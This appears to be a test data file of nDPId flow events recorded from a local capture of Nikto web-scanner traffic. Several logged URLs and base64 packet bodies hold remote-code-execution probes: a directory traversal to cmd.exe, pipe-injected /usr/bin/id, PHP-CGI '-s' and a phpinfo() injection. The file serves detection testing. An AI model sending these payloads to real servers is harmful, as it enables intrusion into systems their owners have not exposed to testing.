-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_packet_id":1,"flow_last_seen":1576420277903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1576420277903,"pkt":"AAAAAAAAAAAAAAAACABFAAEFC5dAAEAGMFp\/AAABfwAAAcd4H5DWdjLSA\/QqXoAYAED++QAAAQEICp1m\/7edZv+3R0VUIC9fdnRpX2Jpbi8uLiUyNTVjLi4lMjU1Yy4uJTI1NWMuLiUyNTVjLi4lMjU1Yy4uJTI1NWN3aW5udC9zeXN0ZW0zMi9jbWQuZXhlPy9jK2RpciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzMwMikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01130{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":751,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277903,"flow_last_seen":1576420277903,"flow_idle_time":7440000,"flow_min_l4_payload_len":209,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1576420277903,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51064,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/_vti_bin\/..%255c..%255c..%255c..%255c..%255c..%255cwinnt\/system32\/cmd.exe?\/c+dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003302)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_packet_id":1,"flow_last_seen":1576420277905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420277905,"pkt":"AAAAAAAAAAAAAAAACABFAADdGS5AAEAGIut\/AAABfwAAAcd6H5B05SBpiRPNwoAYAED+0QAAAQEICp1m\/7mdZv+5R0VUIC9hbnMucGw\/cD0uLi8uLi8uLi8uLi8uLi91c3IvYmluL2lkfCZibGFoIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMzcwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":752,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":752,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277905,"flow_last_seen":1576420277905,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51066,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003370)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7440000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_packet_id":1,"flow_last_seen":1576420277907,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1576420277907,"pkt":"AAAAAAAAAAAAAAAACABFAADhaxBAAEAG0QR\/AAABfwAAAcd8H5CT4lJLpEBlJ4AYAED+1QAAAQEICp1m\/7udZv+7R0VUIC9hbnMvYW5zLnBsP3A9Li4vLi4vLi4vLi4vLi4vdXNyL2Jpbi9pZHwmYmxhaCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAzMzcxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01098{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":753,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277907,"flow_last_seen":1576420277907,"flow_idle_time":7440000,"flow_min_l4_payload_len":173,"flow_max_l4_payload_len":173,"flow_tot_l4_payload_len":173,"flow_avg_l4_payload_len":173,"midstream":1,"thread_ts_msec":1576420277907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51068,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ans\/ans.pl?p=..\/..\/..\/..\/..\/usr\/bin\/id|&blah","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003371)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_packet_id":1,"flow_last_seen":1576420277908,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277908,"pkt":"AAAAAAAAAAAAAAAACABFAAEIG05AAEAGIKB\/AAABfwAAAcd+H5BZWCIKm5\/s0oAYAED+\/AAAAQEICp1m\/7ydZv+8R0VUIC9yZXBvcnRzL3J3c2VydmxldD9zZXJ2ZXI9cmVwc2VydityZXBvcnQ9L3RtcC9oYWNrZXIucmRmK2Rlc3R5cGU9Y2FjaGUrZGVzZm9ybWF0PVBERiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzQzNykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01132{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7440000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/reports\/rwservlet?server=repserv+report=\/tmp\/hacker.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003437)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277909,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_packet_id":1,"flow_last_seen":1576420277909,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277909,"pkt":"AAAAAAAAAAAAAAAACABFAAC9phtAAEAGlh1\/AAABfwAAAceAH5B1J59d+HsAr4AYAED+sQAAAQEICp1m\/72dZv+9R0VUIC9vcGVuLnR4dCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2NDQ4KQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277909,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/open.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006448)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_packet_id":1,"flow_last_seen":1576420277910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277910,"pkt":"AAAAAAAAAAAAAAAACABFAADA+2VAAEAGQNB\/AAABfwAAAceCH5AHKcInz6YgT4AYAED+tAAAAQEICp1m\/76dZv++R0VUIC9meDI5aWQxLnR4dCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2NDQ5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id1.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006449)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_packet_id":1,"flow_last_seen":1576420277912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277912,"pkt":"AAAAAAAAAAAAAAAACABFAADAC6pAAEAGMIx\/AAABfwAAAceEH5BX8jLvG2MI1oAYAED+tAAAAQEICp1m\/8CdZv\/AR0VUIC9meDI5aWQyLnR4dCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjQ1MCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id2.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006450)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420277913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_packet_id":1,"flow_last_seen":1576420277913,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1576420277913,"pkt":"AAAAAAAAAAAAAAAACABFAAC4Ym1AAEAG2dB\/AAABfwAAAceGH5BoAlsuZzuA64AYAED+rAAAAQEICp1m\/8GdZv\/BR0VUIC8\/LXMgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY1MjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420277913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006523)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_packet_id":1,"flow_last_seen":1576420277917,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277917,"pkt":"AAAAAAAAAAAAAAAACABFAADBkMVAAEAGq29\/AAABfwAAAceIH5D4rqmFil0FBYAYAED+tQAAAQEICp1m\/8WdZv\/ER0VUIC9sb2dpbi5waHA\/LXMgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjUyNCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006524)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_packet_id":1,"flow_last_seen":1576420277919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277919,"pkt":"AAAAAAAAAAAAAAAACABFAADk1ppAAEAGZXd\/AAABfwAAAceKH5AeVe\/gFGxiPoAYAED+2AAAAQEICp1m\/8adZv\/GR0VUIC8zcmRwYXJ0eS9waHBNeUFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7440000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_packet_id":1,"flow_last_seen":1576420277920,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420277920,"pkt":"AAAAAAAAAAAAAAAACABFAADbRbxAAEAG9l5\/AAABfwAAAceMH5CzBHzzJnp1p4AYAED+zwAAAQEICp1m\/8idZv\/IR0VUIC9waHBNeUFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 